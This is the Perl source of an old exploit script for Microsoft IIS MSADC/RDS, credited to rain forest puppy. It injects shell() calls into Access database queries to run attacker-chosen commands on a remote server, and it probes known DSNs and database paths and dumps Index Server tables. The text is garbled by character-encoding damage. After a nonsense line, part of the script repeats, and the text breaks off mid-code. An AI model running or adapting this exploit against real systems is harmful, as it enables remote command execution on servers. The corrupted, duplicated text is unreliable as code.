l!/usr/bin/perl
l
l MSADC/RDS &l039;usage&l039; (aka exploit) script version 2
l
l by rain forest puppy
l
l - added UNC support, really didn&l039;t clean up code, but oh well
use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", &l92;%args);
print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --&l92;n";
if (!defined &l036;args&l123;h} && !defined &l036;args&l123;R}) &l123;
print qq~
Usage: msadc.pl -h <host> &l123; -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <&l92;&l92;&l92;&l92;host&l92;&l92;share&l92;&l92;file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
~; exit;}
lllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
l config data
@drives=("c","d","e","f","g","h");
@sysdirs=("winnt","winnt35","winnt351","win","windows");
l we want &l039;wicca&l039; first, because if step 2 made the DSN, it&l039;s ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");
l this is sparse, because I don&l039;t know of many
@sysmdbs=( "&l92;&l92;catroot&l92;&l92;icatalog.mdb",
"&l92;&l92;help&l92;&l92;iishelp&l92;&l92;iis&l92;&l92;htm&l92;&l92;tutorial&l92;&l92;eecustmr.mdb",
"&l92;&l92;system32&l92;&l92;help&l92;&l92;iishelp&l92;&l92;iis&l92;&l92;htm&l92;&l92;tutorial&l92;&l92;eecustmr.mdb",
"&l92;&l92;system32&l92;&l92;certmdb.mdb",
"&l92;&l92;system32&l92;&l92;ias&l92;&l92;ias.mdb",
"&l92;&l92;system32&l92;&l92;ias&l92;dnary.mdb",
"&l92;&l92;system32&l92;&l92;certlog&l92;&l92;certsrv.mdb" ); lthese are %systemroot%
@mdbs=( "&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;cfappman&l92;&l92;data&l92;&l92;applications.mdb",
"&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;forums&l92;&l92;forums_.mdb",
"&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;forums&l92;&l92;data&l92;&l92;forums.mdb",
"&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;security&l92;&l92;realm_.mdb",
"&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;security&l92;&l92;data&l92;&l92;realm.mdb",
"&l92;&l92;cfusion&l92;&l92;database&l92;&l92;cfexamples.mdb",
"&l92;&l92;cfusion&l92;&l92;database&l92;&l92;cfsnippets.mdb",
"&l92;&l92;inetpub&l92;&l92;iissamples&l92;&l92;sdk&l92;&l92;asp&l92;&l92;database&l92;&l92;authors.mdb",
"&l92;&l92;progra~1&l92;&l92;common~1&l92;&l92;system&l92;&l92;msadc&l92;&l92;samples&l92;&l92;advworks.mdb",
"&l92;&l92;cfusion&l92;&l92;brighttiger&l92;&l92;database&l92;&l92;cleam.mdb",
"&l92;&l92;cfusion&l92;&l92;database&l92;&l92;smpolicy.mdb",
"&l92;&l92;cfusion&l92;&l92;database&l92;cypress.mdb",
"&l92;&l92;progra~1&l92;&l92;ableco~1&l92;&l92;ablecommerce&l92;&l92;databases&l92;&l92;acb2_main1.mdb",
"&l92;&l92;website&l92;&l92;cgi-win&l92;&l92;dbsample.mdb",
"&l92;&l92;perl&l92;&l92;prk&l92;&l92;bookexamples&l92;&l92;modsamp&l92;&l92;database&l92;&l92;contact.mdb",
"&l92;&l92;perl&l92;&l92;prk&l92;&l92;bookexamples&l92;&l92;utilsamp&l92;&l92;data&l92;&l92;access&l92;&l92;prk.mdb"
); lthese are just &l92;
lllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
&l036;ip=&l036;args&l123;h}; &l036;clen=0; &l036;reqlen=0; &l036;|=1; &l036;target="";
if (defined &l036;args&l123;v}) &l123; &l036;verbose=1; } else &l123;&l036;verbose=0;}
if (defined &l036;args&l123;d}) &l123; &l036;delay=&l036;args&l123;d};} else &l123;&l036;delay=1;}
if(!defined &l036;args&l123;R})&l123; &l036;target= inet_aton(&l036;ip)
|| die("inet_aton problems; host doesn&l039;t exist?");}
if (!defined &l036;args&l123;R})&l123; &l036;ret = &has_msadc; }
if (defined &l036;args&l123;X}) &l123; &hork_idx; exit; }
if (defined &l036;args&l123;N}) &l123; &get_name; exit; }
if (defined &l036;args&l123;w})&l123;&l036;comm="command /c";} else &l123;&l036;comm="cmd /c";}
if (defined &l036;args&l123;R}) &l123; &load; exit; }
print "Type the command line you want to run (&l036;comm assumed):&l92;n"
. "&l036;comm ";
&l036;in=<STDIN>; chomp &l036;in;
&l036;command="&l036;comm " . &l036;in ;
if (!defined &l036;args&l123;s} || &l036;args&l123;s}==1)&l123;
print "&l92;nStep 1: Trying raw driver to btcustmr.mdb&l92;n";
&try_btcustmr;}
if (!defined &l036;args&l123;s} || &l036;args&l123;s}==2)&l123;
print "&l92;nStep 2: Trying to make our own DSN...";
if (&make_dsn)&l123; print "<<success>>&l92;n"; sleep(3); } else &l123;
print "<<fail>>&l92;n"; }} l we need to sleep to let the server catchup
if (!defined &l036;args&l123;s} || &l036;args&l123;s}==3)&l123;
print "&l92;nStep 3: Trying known DSNs...";
&known_dsn;}
if (!defined &l036;args&l123;s} || &l036;args&l123;s}==4)&l123;
print "&l92;nStep 4: Trying known .mdbs...";
&known_mdb;}
if (!defined &l036;args&l123;s} || &l036;args&l123;s}==5)&l123;
if (defined &l036;args&l123;u})&l123;
print "&l92;xStep 5: Trying UNC...";
&use_unc; } else &l123; "&l92;nNo -u; Step 5 skipped.&l92;n"; }}
if (!defined &l036;args&l123;s} || &l036;args&l123;s}==6)&l123;
if (defined &l036;args&l123;e})&l123;
print "&l92;nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else &l123; "&l92;nNo -e; Step 6 skipped.&l92;n"; }}
print "&l92;n&l92;nNo luck, guess you&l039;ll have to use a real hack, eh?&l92;n";
exit;
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub sendraw &l123; l this saves the whole transaction anyway
my (&l036;pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(&l039;tcp&l039
||0) ||
die("Socket problems&l92;n");
if(connect(S,pack "SnA4x8",2,80,&l036;target))&l123;
open(OUT,">raw.out"); my @in;
select(S); &l036;|=1; print &l036;pstr;
while(<S>)&l123; print OUT &l036;_; push @in, &l036;_;
print STDOUT "." if(defined &l036;args&l123;X});}
close(OUT); select(STDOUT); close(S); return @in;
} else &l123; die("Can&l039;t connect...&l92;n"); }}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub make_header &l123; l make the HTTP request
my &l036;aa, &l036;bb;
if (defined &l036;args&l123;V})&l123;
&l036;aa="VbBusObj.VbBusObjCls.GetRecordset";
&l036;bb="2";
} else &l123;
&l036;aa="AdvancedDataFactory.Query";
&l036;bb="3";}
&l036;msadc=<<EOT
POST /msadc/msadcs.dll/&l036;aa HTTP/1.1
User-Agent: ACTIVEDATA
Host: &l036;ip
Content-Length: &l036;clen
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=&l036;bb
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: &l036;reqlen
EOT
;
&l036;msadc=~s/&l92;n/&l92;r&l92;n/g;
return &l036;msadc;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub make_req &l123; l make the RDS request
my (&l036;switch, &l036;p1, &l036;p2)=@_;
my &l036;req=""; my &l036;t1, &l036;t2, &l036;query, &l036;dsn;
if (&l036;switch==1)&l123; l this is the btcustmr.mdb query
&l036;query="Select * from Customers where City=&l039;|shell(&l92;"&l036;command&l92;")|&l039;";
&l036;dsn="driver=&l123;Microsoft Access Driver (*.mdb)};dbq=" .
&l036;p1 . ":&l92;&l92;" . &l036;p2 . "&l92;&l92;help&l92;&l92;iis&l92;&l92;htm&l92;&l92;tutorial&l92;&l92;btcustmr.mdb;";}
elsif (&l036;switch==2)&l123; l this is general make table query
&l036;query="create table AZZ (B int, C varchar(10))";
&l036;dsn="&l036;p1";}
elsif (&l036;switch==3)&l123; l this is general exploit table query
&l036;query="select * from AZZ where C=&l039;|shell(&l92;"&l036;command&l92;")|&l039;";
&l036;dsn="&l036;p1";}
elsif (&l036;switch==4)&l123; l attempt to hork file info from index server
&l036;query="select path from scope()";
&l036;dsn="Provider=MSIDXS;";}
elsif (&l036;switch==5)&l123; l bad query
&l036;query="select";
&l036;dsn="&l036;p1";}
elsif (&l036;switch==6)&l123; l this is table-independant query (new)
&l036;query="select * from MSysModules where name=&l039;|shell(&l92;"&l036;command&l92;")|&l039;";
&l036;dsn="&l036;p1";}
&l036;t1= make_unicode(&l036;query);
&l036;t2= make_unicode(&l036;dsn);
if(defined &l036;args&l123;V}) &l123; &l036;req=""; } else &l123;&l036;req = "&l92;x02&l92;x00&l92;x03&l92;x00"; }
&l036;req.= "&l92;x08&l92;x00" . pack ("S1", length(&l036;t1));
&l036;req.= "&l92;x00&l92;x00" . &l036;t1 ;
&l036;req.= "&l92;x08&l92;x00" . pack ("S1", length(&l036;t2));
&l036;req.= "&l92;x00&l92;x00" . &l036;t2 ;
&l036;req.="&l92;r&l92;n--!ADM!ROX!YOUR!WORLD!--&l92;r&l92;n";
return &l036;req;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub make_unicode &l123; l quick little function to convert to unicode
my (&l036;in)=@_; my &l036;out;
for (&l036;c=0; &l036;c < length(&l036;in); &l036;c++) &l123; &l036;out.=substr(&l036;in,&l036;c,1) . "&l92;x00"; }
return &l036;out;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub rdo_success &l123; l checks for RDO return success (this is kludge)
my (@in) = @_; my &l036;base=content_start(@in);
if(&l036;in[&l036;base]=~/multipart&l92;/mixed/)&l123;
return 1 if( &l036;in[&l036;base+10]=~/^&l92;x09&l92;x00/ );}
return 0;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub make_dsn &l123; l this (tries to) make a DSN for us
print "&l92;nMaking DSN: ";
foreach &l036;drive (@drives) &l123;
print "&l036;drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft&l92;%2B" .
"Access&l92;%2BDriver&l92;%2B&l92;%28*.mdb&l92;%29&l92;&dsn=wicca&l92;&dbq="
. &l036;drive . "&l92;%3A&l92;%5Csys.mdb&l92;&newdb=CREATE_DB&l92;&attr= HTTP/1.0&l92;n&l92;n");
&l036;results[0]=~mlHTTP&l92;/([0-9&l92;.]+) ([0-9]+) ([^&l92;n]*)l;
return 0 if &l036;2 eq "404"; l not found/doesn&l039;t exist
if(&l036;2 eq "200") &l123;
foreach &l036;line (@results) &l123;
return 1 if &l036;line=~/<H2>Datasource creation successful<&l92;/H2>/;}}
} return 0;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub verify_exists &l123;
my (&l036;page)=@_;
my @results=sendraw("GET &l036;page HTTP/1.0&l92;n&l92;n");
return &l036;results[0];}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub try_btcustmr &l123;
foreach &l036;dir (@sysdirs) &l123;
print "&l036;dir -> "; l fun status so you can see progress
foreach &l036;drive (@drives) &l123;
print "&l036;drive: "; l ditto
&l036;reqlen=length( make_req(1,&l036;drive,&l036;dir) ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(1,&l036;drive,&l036;dir));
if (rdo_success(@results))&l123;print "Success!&l92;n";
save("dbq=".&l036;drive.":&l92;&l92;".&l036;dir."&l92;&l92;help&l92;&l92;iis&l92;&l92;htm&l92;&l92;tutorial&l92;&l92;btcustmr.mdb;");
exit;}
else &l123; verbose(odbc_error(@results)); funky(@results);}} print "&l92;n";}}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub odbc_error &l123;
my (@in)=@_; my &l036;base;
my &l036;base = content_start(@in);
if(&l036;in[&l036;base]=~/application&l92;/x-varg/)&l123; l it *SHOULD* be this
&l036;in[&l036;base+4]=~s/[^a-zA-Z0-9 &l92;[&l92;]&l92;:&l92;/&l92;&l92;&l039;&l92;(&l92]//g;
&l036;in[&l036;base+5]=~s/[^a-zA-Z0-9 &l92;[&l92;]&l92;:&l92;/&l92;&l92;&l039;&l92;(&l92]//g;
&l036;in[&l036;base+6]=~s/[^a-zA-Z0-9 &l92;[&l92;]&l92;:&l92;/&l92;&l92;&l039;&l92;(&l92]//g;
return &l036;in[&l036;base+4].&l036;in[&l036;base+5].&l036;in[&l036;base+6];}
print "&l92;nNON-STANDARD error. Please sent this info to rfp&l92;@wiretrip.net:&l92;n";
print "&l036;in : " . &l036;in[&l036;base] . &l036;in[&l036;base+1] . &l036;in[&l036;base+2] . &l036;in[&l036;base+3] .
&l036;in[&l036;base+4] . &l036;in[&l036;base+5] . &l036;in[&l036;base+6]; exit;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub verbose &l123;
my (&l036;in)=@_;
return if !&l036;verbose;
print STDOUT "&l92;n&l036;in&l92;n";}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub save &l123;
my (&l036;p1)=@_; my &l036;ropt="";
open(OUT, ">rds.save") || print "Problem saving parameters...&l92;n";
if (defined &l036;args&l123;c})&l123; &l036;ropt="c ";}
if (defined &l036;args&l123;V})&l123; &l036;ropt.="V ";}
if (defined &l036;args&l123;w})&l123; &l036;ropt.="w ";}
print OUT "v2&l92;n&l036;ip&l92;n&l036;ropt&l92;n&l036;p1&l92;n";
close OUT;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub load &l123;
my (&l036;action)=@_;
my @p; my &l036;drvst="driver=&l123;Microsoft Access Driver (*.mdb)};";
open(IN,"<rds.save") || die("Couldn&l039;t open rds.save&l92;n");
@p=<IN>; close(IN);
die("Wrong rds.save version") if &l036;p[0] ne "v2&l92;n";
&l036;ip="&l036;p[1]"; &l036;ip=~s/&l92;n//g;
&l036;target= inet_aton(&l036;ip) || die("inet_aton problems");
print "Resuming to &l036;ip ...";
@switches=split(/ /,&l036;p[2]);
foreach &l036;switch (@switches) &l123;
&l036;args&l123;&l036;switch}="1";}
if (defined &l036;args&l123;w})&l123;&l036;comm="command /c";} else &l123;&l036;comm="cmd /c";}
print "Type the command line you want to run (&l036;comm assumed):&l92;n"
. "&l036;comm ";
&l036;in=<STDIN>; chomp &l036;in;
&l036;command="&l036;comm " . &l036;in ;
&l036;torun="&l036;p[3]"; &l036;torun=~s/&l92;n//g;
if(&l036;torun=~/btcustmr/)&l123;
&l036;args&l123;&l039;c&l039;}="1";} l this is a kludge to make it work
if(&l036;torun=~/^dbq/)&l123; &l036;torun=&l036;drvst.&l036;torun; }
if(run_query("&l036;torun"))&l123;
print "Success!&l92;n";} else &l123; print "failed&l92;n"; }
exit;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub create_table &l123;
return 1 if (!defined &l036;args&l123;c});
return 1 if (defined &l036;args&l123;V});
my (&l036;in)=@_;
&l036;reqlen=length( make_req(2,&l036;in,"") ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(2,&l036;in,""));
return 1 if rdo_success(@results);
my &l036;temp= odbc_error(@results); verbose(&l036;temp);
return 1 if &l036;temp=~/Table &l039;AZZ&l039; already exists/;
return 0;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub known_dsn &l123;
foreach &l036;dSn (@dsns) &l123;
print ".";
next if (!is_access("DSN=&l036;dSn"));
if(create_table("DSN=&l036;dSn"))&l123;
if(run_query("DSN=&l036;dSn"))&l123;
print "&l036;dSn: Success!&l92;n"; save ("dsn=&l036;dSn"); exit; }}} print "&l92;n";}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub is_access &l123;
my (&l036;in)=@_;
return 1 if (!defined &l036;args&l123;c});
return 1 if (defined &l036;args&l123;V});
&l036;reqlen=length( make_req(5,&l036;in,"") ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(5,&l036;in,""));
my &l036;temp= odbc_error(@results);
verbose(&l036;temp); return 1 if (&l036;temp=~/Microsoft Access/);
return 0;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub run_query &l123;
my (&l036;in)=@_; my &l036;req;
if (defined &l036;args&l123;c})&l123;&l036;req=3;} else &l123;&l036;req=6;}
&l036;reqlen=length( make_req(&l036;req,&l036;in,"") ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(&l036;req,&l036;in,""));
return 1 if rdo_success(@results);
my &l036;temp= odbc_error(@results); verbose(&l036;temp);
return 0;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub known_mdb &l123;
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my &l036;dir, &l036;drive, &l036;mdb;
my &l036;drv="driver=&l123;Microsoft Access Driver (*.mdb)}; dbq=";
foreach &l036;drive (@drives) &l123;
foreach &l036;dir (@sysdirs)&l123;
foreach &l036;mdb (@sysmdbs) &l123;
print ".";
if(create_table(&l036;drv.&l036;drive.":&l92;&l92;".&l036;dir.&l036;mdb))&l123;
if(run_query(&l036;drv . &l036;drive . ":&l92;&l92;" . &l036;dir . &l036;mdb))&l123;
print "&l036;mdb: Success!&l92;n"; save ("dbq=".&l036;drive .":&l92;&l92;".&l036;dir.&l036;mdb); exit;
}}}}}
foreach &l036;drive (@drives) &l123;
foreach &l036;mdb (@mdbs) &l123;
print ".";
if(create_table(&l036;drv.&l036;drive.":".&l036;mdb))&l123;
if(run_query(&l036;drv.&l036;drive.":".&l036;mdb))&l123;
print "&l036;mdb: Success!&l92;n"; save ("dbq=".&l036;drive.":".&l036;mdb); exit;
}}}}
}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub hork_idx &l123;
print "&l92;nAttempting to dump Index Server tables...&l92;n";
print " NOTE: Sometimes this takes a while, other times it stalls&l92;n&l92;n";
&l036;reqlen=length( make_req(4,"","") ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(4,"",""));
if (rdo_success(@results))&l123;
my &l036;max=@results; my &l036;c; my %d;
for(&l036;c=19; &l036;c<&l036;max; &l036;c++)&l123;
&l036;results[&l036;c]=~s/&l92;x00//g;
&l036;results[&l036;c]=~s/[^a-zA-Z0-9:~ &l92;&l92;&l92;._]&l123;1,40}/&l92;n/g;
&l036;results[&l036;c]=~s/[^a-zA-Z0-9:~ &l92;&l92;&l92;._&l92;n]//g;
&l036;results[&l036;c]=~/([a-zA-Z]&l92;:&l92;&l92([a-zA-Z0-9 _~&l92;&l92;]+)&l92;&l92;/;
&l036;d&l123;"&l036;1&l036;2"}="";}
foreach &l036;c (keys %d)&l123; print "&l036;c&l92;n"; }
} else &l123;print "Index server not installed/query failed&l92;n"; }}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub dsn_dict &l123;
open(IN, "<&l036;args&l123;e}") || die("Can&l039;t open external dictionary&l92;n");
while(<IN>)&l123;
&l036;hold=&l036;_; &l036;hold=~s/[&l92;r&l92;n]//g; &l036;dSn="&l036;hold"; print ".";
next if (!is_access("DSN=&l036;dSn"));
if(create_table("DSN=&l036;dSn"))&l123;
if(run_query("DSN=&l036;dSn"))&l123;
print "Success!&l92;n"; save ("dsn=&l036;dSn"); exit; }}}
print "&l92;n"; close(IN);}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub content_start &l123; l this will take in the server headers
my (@in)=@_; my &l036;c;
for (&l036;c=1;&l036;c<500;&l036;c++) &l123; l assume there&l039;s less than 500 headers
if(&l036;in[&l036;c] =~/^&l92;x0d&l92;x0a/)&l123;
if (&l036;in[&l036;c+1]=~/^HTTP&l92;/1.[01] [12]00/) &l123; &l036;c++; }
else &l123; return &l036;c+1; }}}
return -1;} l it should never get here actually
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub funky &l123;
my (@in)=@_; my &l036;error=odbc_error(@in);
if(&l036;error=~/ADO could not find the specified provider/)&l123;
print "&l92;nServer returned an ADO miscofiguration message&l92;nAborting.&l92;n";
exit;}
if(&l036;error=~/A Handler is required/)&l123;
print "&l92;nServer has custom handler filters (they most likely are patched)&l92;n";
exit;}
if(&l036;error=~/specified Handler has denied Access/)&l123;
print "&l92;nADO handlers denied access (they most likely are patched)&l92;n";
exit;}
if(&l036;error=~/server has denied access/)&l123;
print "&l92;nADO handlers denied access (they most likely are patched)&l92;n";
exit;}}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub has_msadc &l123;
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0&l92;n&l92;n");
my &l036;base=content_start(@results);
return if(&l036;results[&l036;base]=~/Content-Type: application&l92;/x-varg/);
my @s=grep("Server: ",@results);
if(&l036;s[0]!~/IIS/)&l123; print "Doh! They&l039;re not running IIS.&l92;n&l036;s[0]&l92;n" }
else &l123; print "/msadc/msadcs.dll was not found.&l92;n";}
exit;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub use_unc &l123;
&l036;uncpath=&l036;args&l123;u};
&l036;driverline="driver=&l123;Microsoft Access Driver (*.mdb)};dbq=";
if(!&l036;uncpath=~/^&l92;&l92;&l92;&l92;[a-zA-Z0-9_.]+&l92;&l92;[-a-zA-Z0-9_]+&l92;&l92;.+/)&l123;
print "Your UNC path sucks. You need the following format:&l92;n".
"&l92;&l92;server(ip preferable)&l92;share&l92;some-file.mdb&l92;n&l92;n"; exit; }
if(create_table(&l036;driverline.&l036;uncpath))&l123;
if(run_query(&l036;driverline.&l036;uncpath))&l123;
print "Success!&l92;n"; save ("dbq=".&l036;uncpath); exit;}}
}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub get_name &l123; l this was added last minute
my &l036;msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
User-Agent: ACTIVEDATA
Host: &l036;ip
Content-Length: 126
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0
--!ADM!ROX!YOUR!WORLD!--
EOT
; &l036;msadc=~s/&l92;n/&l92;r&l92;n/g;
my @results=sendraw(&l036;msadc);
my &l036;base=content_start(@results);
&l036;results[&l036;base+6]=~s/[^-A-Za-z0-9!&l92;@&l92;l&l92;&l036;&l92;%^&l92;&*()&l92;[&l92;]_=+~<>.,?]//g;
print "Machine name: &l036;results[&l036;base+6]&l92;n";}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
l special greets to trambottic, hex_edit, vacuum (technotronic), all l!adm,
l l!w00w00 & lrhino9 (that&l039;s a lot of people, and they are all very elite and
l good friends!), wiretrip, l0pht, nmrc & all of phrack
l
l thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
l
l I wish I could really name everyone, but I can&l039;t. Don&l039;t feel slighted if
l your not on the list...
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
ALINTININ ALINTISININ ALINTISIDIRuah
l
l MSADC/RDS &l039;usage&l039; (aka exploit) script version 2
l
l by rain forest puppy
l
l - added UNC support, really didn&l039;t clean up code, but oh well
use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", &l92;%args);
print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --&l92;n";
if (!defined &l036;args&l123;h} && !defined &l036;args&l123;R}) &l123;
print qq~
Usage: msadc.pl -h <host> &l123; -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <&l92;&l92;&l92;&l92;host&l92;&l92;share&l92;&l92;file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
~; exit;}
lllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
l config data
@drives=("c","d","e","f","g","h");
@sysdirs=("winnt","winnt35","winnt351","win","windows");
l we want &l039;wicca&l039; first, because if step 2 made the DSN, it&l039;s ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");
l this is sparse, because I don&l039;t know of many
@sysmdbs=( "&l92;&l92;catroot&l92;&l92;icatalog.mdb",
"&l92;&l92;help&l92;&l92;iishelp&l92;&l92;iis&l92;&l92;htm&l92;&l92;tutorial&l92;&l92;eecustmr.mdb",
"&l92;&l92;system32&l92;&l92;help&l92;&l92;iishelp&l92;&l92;iis&l92;&l92;htm&l92;&l92;tutorial&l92;&l92;eecustmr.mdb",
"&l92;&l92;system32&l92;&l92;certmdb.mdb",
"&l92;&l92;system32&l92;&l92;ias&l92;&l92;ias.mdb",
"&l92;&l92;system32&l92;&l92;ias&l92;dnary.mdb",
"&l92;&l92;system32&l92;&l92;certlog&l92;&l92;certsrv.mdb" ); lthese are %systemroot%
@mdbs=( "&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;cfappman&l92;&l92;data&l92;&l92;applications.mdb",
"&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;forums&l92;&l92;forums_.mdb",
"&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;forums&l92;&l92;data&l92;&l92;forums.mdb",
"&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;security&l92;&l92;realm_.mdb",
"&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;security&l92;&l92;data&l92;&l92;realm.mdb",
"&l92;&l92;cfusion&l92;&l92;database&l92;&l92;cfexamples.mdb",
"&l92;&l92;cfusion&l92;&l92;database&l92;&l92;cfsnippets.mdb",
"&l92;&l92;inetpub&l92;&l92;iissamples&l92;&l92;sdk&l92;&l92;asp&l92;&l92;database&l92;&l92;authors.mdb",
"&l92;&l92;progra~1&l92;&l92;common~1&l92;&l92;system&l92;&l92;msadc&l92;&l92;samples&l92;&l92;advworks.mdb",
"&l92;&l92;cfusion&l92;&l92;brighttiger&l92;&l92;database&l92;&l92;cleam.mdb",
"&l92;&l92;cfusion&l92;&l92;database&l92;&l92;smpolicy.mdb",
"&l92;&l92;cfusion&l92;&l92;database&l92;cypress.mdb",
"&l92;&l92;progra~1&l92;&l92;ableco~1&l92;&l92;ablecommerce&l92;&l92;databases&l92;&l92;acb2_main1.mdb",
"&l92;&l92;website&l92;&l92;cgi-win&l92;&l92;dbsample.mdb",
"&l92;&l92;perl&l92;&l92;prk&l92;&l92;bookexamples&l92;&l92;modsamp&l92;&l92;database&l92;&l92;contact.mdb",
"&l92;&l92;perl&l92;&l92;prk&l92;&l92;bookexamples&l92;&l92;utilsamp&l92;&l92;data&l92;&l92;access&l92;&l92;prk.mdb"
); lthese are just &l92;
lllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
&l036;ip=&l036;args&l123;h}; &l036;clen=0; &l036;reqlen=0; &l036;|=1; &l036;target="";
if (defined &l036;args&l123;v}) &l123; &l036;verbose=1; } else &l123;&l036;verbose=0;}
if (defined &l036;args&l123;d}) &l123; &l036;delay=&l036;args&l123;d};} else &l123;&l036;delay=1;}
if(!defined &l036;args&l123;R})&l123; &l036;target= inet_aton(&l036;ip)
|| die("inet_aton problems; host doesn&l039;t exist?");}
if (!defined &l036;args&l123;R})&l123; &l036;ret = &has_msadc; }
if (defined &l036;args&l123;X}) &l123; &hork_idx; exit; }
if (defined &l036;args&l123;N}) &l123; &get_name; exit; }
if (defined &l036;args&l123;w})&l123;&l036;comm="command /c";} else &l123;&l036;comm="cmd /c";}
if (defined &l036;args&l123;R}) &l123; &load; exit; }
print "Type the command line you want to run (&l036;comm assumed):&l92;n"
. "&l036;comm ";
&l036;in=<STDIN>; chomp &l036;in;
&l036;command="&l036;comm " . &l036;in ;
if (!defined &l036;args&l123;s} || &l036;args&l123;s}==1)&l123;
print "&l92;nStep 1: Trying raw driver to btcustmr.mdb&l92;n";
&try_btcustmr;}
if (!defined &l036;args&l123;s} || &l036;args&l123;s}==2)&l123;
print "&l92;nStep 2: Trying to make our own DSN...";
if (&make_dsn)&l123; print "<<success>>&l92;n"; sleep(3); } else &l123;
print "<<fail>>&l92;n"; }} l we need to sleep to let the server catchup
